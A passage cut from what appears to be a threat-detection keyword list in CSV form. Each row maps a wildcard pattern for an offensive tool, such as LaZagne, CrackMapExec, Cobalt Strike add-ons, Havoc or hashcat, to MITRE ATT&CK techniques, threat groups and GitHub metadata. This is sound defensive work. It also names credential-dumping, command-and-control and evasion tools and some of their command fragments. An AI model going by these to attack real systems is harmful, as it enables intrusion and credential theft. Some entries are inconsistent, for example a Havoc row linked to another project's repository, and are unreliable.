Evasion,https://github.com/stormshadow07/HackTheWorld,1,0,N/A,N/A,9,866,179,2020-04-28T20:17:54Z,2018-02-17T11:46:40Z -*hacktool*,signature_keyword,Antivirus Signature,hacktool keyword. a repository could be named as such. 
o AV signature,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,hacktool signatures,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool.ASP.*.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool.HTML.*.**,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool.Java.*.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Hacktool.Lazagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Hacktool.Linux*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*HackTool.PHP.*.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Hacktool.Windows*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Hacktool/Win.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*HackTool:Linux*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:MSIL*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation 
tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:PowerShell*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:PowerShell/*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*HackTool:Python*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:Python/*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Hacktool:SH*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:VBS*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:Win32*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*HackTool:Win64*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:Win64*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*hacktools-*.xpi*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*,offensive_tool_keyword,hack-tools,The all-in-one 
Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*Hack-Tools-master*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*Hack-with-Github*,offensive_tool_keyword,Github Username,An Open Source Hacking Tools database,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Hack-with-Github,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*hades_directsys.exe*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*HadesLdr-main*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*hak5/omg-payloads*,offensive_tool_keyword,omg-payloads,Official payload library for the O.MG line of products from Mischief Gadgets,T1200 - T1095 - T1059.006 - T1027,TA0010 - TA0011,N/A,N/A,Hardware,https://github.com/hak5/omg-payloads,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*haKCers.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*hakluke/hakrawler*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,1,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*hakrawler -*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*hakrawler.go*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,1,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*hakrawler@latest*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web 
Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*hakrawler-ip-range*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*hakrawler-master*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,1,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*haktrails subdomains*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*Hakumarachi/Bropper*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,1,N/A,N/A,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*handelsregister-get-company-names *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*handle_nessus_file*,offensive_tool_keyword,crackmapexec,function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*handlekatz.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*handlekatz.x64.*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com//EspressoCake/HandleKatz_BOF,1,1,N/A,10,10,N/A,N/A,N/A,N/A 
-*handlekatz_bof.*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com//EspressoCake/HandleKatz_BOF,1,1,N/A,10,,N/A,,, -*handlekatz_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*HANDLEKATZ_EXE_NAME=*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*Hangingsword/HouQing*,offensive_tool_keyword,cobaltstrike,Hou 
Qing-Advanced AV Evasion Tool For Red Team Ops,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Hangingsword/HouQing,1,1,N/A,10,10,205,59,2021-01-14T08:38:12Z,2021-01-14T07:13:21Z -*HardHatC2*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*hardhatc2.com*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*HardHatC2Client*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z 
-*HarmJ0y/DAMP*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*harvestcrop.exe * *,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*HasAutoAdminLogonCredentials*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*hash3liZer/SillyRAT*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,1,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z -*hash3liZer/wifijammer*,offensive_tool_keyword,wifijammer,wifijammer,T1497 - T1498 - T1499,TA0040,N/A,N/A,Sniffing & Spoofing,https://github.com/hash3liZer/wifijammer,1,1,N/A,N/A,2,168,43,2021-06-10T12:33:49Z,2018-01-20T16:26:45Z -*Hash-Buster*,offensive_tool_keyword,Hash-Buster,hash cracking tool ,T1201 - T1110 - T1021,TA0001 - TA0002 - TA0006,N/A,N/A,POST Exploitation tools,https://github.com/s0md3v/Hash-Buster,1,1,N/A,N/A,10,1543,392,2023-04-11T09:43:06Z,2017-07-03T17:28:51Z -*hashcat*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery 
utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,0,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -*hashcat-*.7z*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,1,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -*hashcat.git*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,1,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -*hashcat/hashcat*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,1,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -*hashdump.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*hashdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*hashdump_sam*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*HashDumpDCImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*HashDumpSAMImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*hasherezade/exe_to_dll*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*hasherezade/exe_to_dll*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*-hashes* --escalate-user*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation 
Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*hashonymize --ntds * --kerberoast *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*HashPals/Name-That-Hash*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*--hash-type 1000 --potfile-path*.ntds.cracked*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hashview*@*localhost*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*hashview/config.conf*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*hashview/hashview*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential 
Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*hashview-agent.*.tgz*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*hashview-agent.py*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*HasSPNNoPreauth*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*hatlord/snmpwn*,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,1,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*havoc client*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*havoc server*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 